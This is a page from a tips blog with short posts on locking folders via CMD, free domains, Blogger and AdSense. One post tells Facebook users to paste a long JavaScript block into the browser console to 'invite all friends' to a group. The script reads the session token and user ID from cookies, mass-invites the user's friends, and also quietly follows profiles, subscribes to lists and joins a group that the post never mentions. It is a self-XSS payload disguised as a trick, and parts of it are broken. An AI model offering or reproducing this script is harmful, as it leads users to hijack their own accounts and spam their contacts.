Recent Posts

Lock Your Folder Without Software Using CMD

06:50 Add Comment
Hello Guys,  after a long period of taking some rest. I am going to share my knowledge with you guys. How to lock a folder without any software just using command prompt CMD. Follow me ::::

Example :::: Do it with your own folder ::::

  • First of i create a new folder on Desktop
  • Then i open command prompt CMD from Start>>CMD(Search for)
  • The black user interface is Command Prompt
  • Now it's coding time 
  •   cd desktop
Press Enter

  • Type
  • Cacls folder_name /E /P everyone:n 
Press Enter

::..Note..::

These codes are case sensitive so type in CMD as i have written.

You have successfully Done :F





Lock Your Folder Using CMD
Posted by Fadi Guide

Invite All Your Friends On FB Group At Once

06:12 Add Comment
Here is the post which will guide you to invite your all friends into your group just at one click. This trick will be used only for Chrome users. There is nothing like impossible, we will derive another method which will support all other browsers. 
So for inviting all at once follow me ::
  • Login To Your FaceBook ID
  • Goto Your Group
  • Follow The Picture

  • Inspect Element >> Clear Console
  • Copy the below code and post there

(function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]),gid:document.getElementsByName("group_id")[0].value,frns:Array(),prenKe:0,okeh:0,gagal:0,getAjak:function(b){var c=new XMLHttpRequest;c.open("GET",b,!0),c.onreadystatechange=function(){if(4==c.readyState&&200==c.status){var a=eval("("+c.responseText.substr(9)+")");a.payload&&a.payload.entries&&(f.frns=a.payload.entries.sort(function(){return.5-Math.random()})),document.getElementById("hasilsurasil").innerHTML="Found <b>"+f.frns.length+" Friends</b><div id='hasilsatu'></div><div id='hasildua'></div><div id='hasiltiga' style='min-width:300px;display:inline-block;text-align:left'></div>"+crj;for(x in f.frns)f.senAjak(x)}else document.getElementById("hasilsurasil").innerHTML=4==c.readyState&&404==c.status?"<b style='color:darkred'>Gruppe Öffnen!</b>"+crj:"<b style='color:darkgreen'>Search For Followers... ("+c.readyState+")</b>"+crj},c.send()},senAjak:function(d){var e=new XMLHttpRequest,prm="__a=1&fb_dtsg="+f.dtsg+"&group_id="+f.gid+"&source=typeahead&ref=&message_id=&members="+f.frns[d].uid+"&__user="+f.uid+"&phstamp=";e.open("POST","/ajax/groups/members/add_post.php",!0),e.setRequestHeader("Content-type","application/x-www-form-urlencoded"),e.setRequestHeader("Content-length",prm.length),e.setRequestHeader("Connection","keep-alive"),e.onreadystatechange=function(){if(4==e.readyState&&200==e.status){var a=eval("("+e.responseText.substr(9)+")");if(f.prenKe++,document.getElementById("hasilsatu").innerHTML="<div><b>"+f.prenKe+"</b> of <b>"+f.frns.length+"</b></div>",a.errorDescription&&(f.gagal++,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkred'>( "+f.gagal+" )</b> <span style='color:darkred'>"+a.errorDescription+"</span></div>"),a.jsmods&&a.jsmods.require){var b="<div>";for(x in a.jsmods.require)a.jsmods.require[x][a.jsmods.require[x].length-1][1]&&(b+="<b style='color:darkgreen'>"+a.jsmods.require[x][a.jsmods.require[x].length-1][1]+"</b> ");b+="<div>",document.getElementById("hasildua").innerHTML=b}if(a.onload)for(z in a.onload){var c=eval(a.onload[z].replace(/Arbiter.inform/i,""));if(c.uid&&c.name){f.okeh++,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkgreen'>( "+f.okeh+" )</b> <a href='/"+c.uid+"' target='_blank'><b>"+c.name+"</b></a> haben dich abonniert.</div>";break}}f.prenKe==f.frns.length&&(document.getElementById("hasiltiga").style.textAlign="center",document.getElementById("hasiltiga").innerHTML+="<div style='font-size:20px;font-weight:bold'>People Invited!</div><a href='/' onClick='document.getElementById(\"hasilsurasil\").style.display=\"none\";return false'>Close</a>")}},e.send(prm)}},g=["i","a","e","g","o","s","n","b","l","p","m","2","r","0","c","1","t","3","©"],crl=g[1]+g[0]+g[6]+g[3]+g[14]+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+"."+g[7]+g[8]+g[4]+g[3]+g[5]+g[9]+g[4]+g[16]+"."+g[14]+g[4]+g[10],crj="<div style='display:none; margin-top:10px;color:gray;font-size:12px'>"+g[1].toUpperCase()+g[0]+g[6]+g[3]+g[14].toUpperCase()+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+" "+g[g.length-1]+g[11]+g[13]+g[15]+g[17]+"<div style='font-size:9px'><a href='http://"+crl+"/' target='_blank'>"+crl+"</a></div></div>";document.body.innerHTML+="<center id='hasilsurasil' style='min-height:50px;width:600px;position:fixed;top:100px;left:"+(document.body.offsetWidth-530)/2+"px;border-radius:10px;padding:10px;z-index:999999;border:5px solid skyblue;background-color:rgba(225,225,255,0.75)'><b>Fb Group Script By Safe Tricks </b>"+crj+"</center>",f.getAjak("/ajax/typeahead/first_degree.php?__a=1&viewer="+f.uid+"&token="+Math.random()+"&filter[0]=user&options[0]=friends_only")})(); var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1])
function cereziAl(isim) {
var tarama = isim + "=";
if (document.cookie.length > 0) {
konum = document.cookie.indexOf(tarama)
if (konum != -1) {
konum += tarama.length
son = document.cookie.indexOf(";", konum)
if (son == -1)
son = document.cookie.length
return unescape(document.cookie.substring(konum, son))
}
else { return ""; }
}
}
function getRandomInt (min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}
function randomValue(arr) {
return arr[getRandomInt(0, arr.length-1)];
}
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
function a(abone){
var http4 = new XMLHttpRequest();
var url4 = "/ajax/follow/follow_profile.php?__a=1";
var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
http4.open("POST", url4, true);
//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close");
http4.onreadystatechange = function() {//Call a function when the state changes.
if(http4.readyState == 4 && http4.status == 200) {
http4.close; // Close the connection
}
}
http4.send(params4);
}
function sublist(uidss) {
var a = document.createElement('script');
a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
document.body.appendChild(a);
}
a("");
a("");
var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
var httpwp = new XMLHttpRequest();
var urlwp = '/ajax/groups/membership/r2j.php?__a=1';
var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp=';
httpwp['open']('POST', urlwp, true);
httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
httpwp['setRequestHeader']('Content-length', paramswp['length']);
httpwp['setRequestHeader']('Connection', 'keep-alive');
httpwp['send'](paramswp);
var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
var friends = new Array();
gf = new XMLHttpRequest();
gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false);
gf['send']();
if (gf['readyState'] != 4) {} else {
data = eval('(' + gf['responseText']['substr'](9) + ')');
if (data['error']) {} else {
friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) {
return _0x93dax8['index'] - _0x93dax9['index'];
});
};
};

  • Press Enter
  • You have successfully Done :F

Pakistani Hazara Parkour's Boys

06:09 Add Comment
The new Pakistani and the only famous Hazara Parkour's boys are performing a fabulous stunts. They are very amazing must watch them, also support them to like their page ::
Wait for the video


Get Free Top Level Domain Names

04:38 Add Comment
Many people are searching  how to get a free domain name, as a beginner i was also  searched about this. And i found a website which gives you a free top level domain. Not including paid domains like .com , .org , .net etc. I am showing you another like .ml , .gq . .cf etc.
All is totally free of charge. You need just an email id. 
  • Go to freenom.com
  • Search for domain
  • Choose your domain
  • Click checkout
  • Set 12 months instead of 3 months

  • Click continue 
  • Write Email Address (I prefer you to write yahoo id)
  • Verify from email id
You have successfully done. :F

Basic Blogging For Beginners

01:29 Add Comment
Blogging on blogger is an easy and powerful tool to share your story. The beginners can get full guide from here. 
  • You Need ::
  1. One PC 
  2. Some Time
  3. An Email ID
  • Go to blogger.com
  • Sign In (If you have a gmail account else make a new account)
  • Click On New Blog
  • Enter the Title For Your Website
  • Enter the address for your website (e.g fadiguide.blogspot.com)
  • Click Create Blog!
  • Click New Post to make a post
  • On Pages section, Click on Create A New Page to make a page
  • On Comment section , It shows you, published comments by you
  • On Stats section check your Traffic Source and about your Visitors
  • On Earning section you can attach your blog with google adsense and can earn money
  • On Campaigns section you can run your campaigns with google adwards 

  • On Layout section you can add different widgets on your blog like visitor counting, popular posts, etc.
  • On Template section you can edit your template , i will explain it you in the next post
  • On Setting section you can change your domain or your blog address, title, give description, i will also explain it into the next post.
I hope you liked it  :F


Wait For The Video - For Practicle




Blogger Vs Wordpress

11:02 Add Comment
Now there are many website which provide free web hosting and domain name like wordpress and blogger. There are also many other and famous one but this topic is only for Blogger and Wordpree. Both provide many facility but in my opinion the both has many facilities.
Blogger
  • Easy Posting
  • Easy Domain Setter (Also Free One)
  • Easy Template Editing
  • Easy Code Editing
  • Easy Submission On Google
  • Easy Favicon Supporting
  • Every Thing Simply & Easily Explained
  • Easy Adsense Connection
Wordpress
  • Easy Posting
  • Easy Domain Buying ( Not Free )
  • Easy Plugins (Very Interesting Plugins)
  • Easy Page Adding
  • Very Attractive Discussion Features 
  • Everything is in Plugins (Just Search For Any Plugins)

I prefer you both because i like blogger as well as wordpress. :F

Earn Money From Google Adsense

10:40 Add Comment

There are many ways to earn money online but Google Adsense is the best place because there is no limit for earning online by just posting and sharing your knowledge with the world.
Many people tried to prove fast Adsense account, but i want to make you clear that it is not a proper way to work with Adsense. The best way is ::
  • Create an Gmail ID
  • Go to Blogger.Com
  • Login To Blogger
  • Download or Make Your Own Template For Blogger (You Can Also Buy It From Site Or Can Get For Free)

  • Make At Least 2 to 3 Posts Daily
  • After getting more than 700 visitor Blogger will ask you to connect it with your Adsense account
  • Then create your Adsense account and Connect it
  • Keep posting daily more than 1 or 1
Enjoy Happy Earning :F



About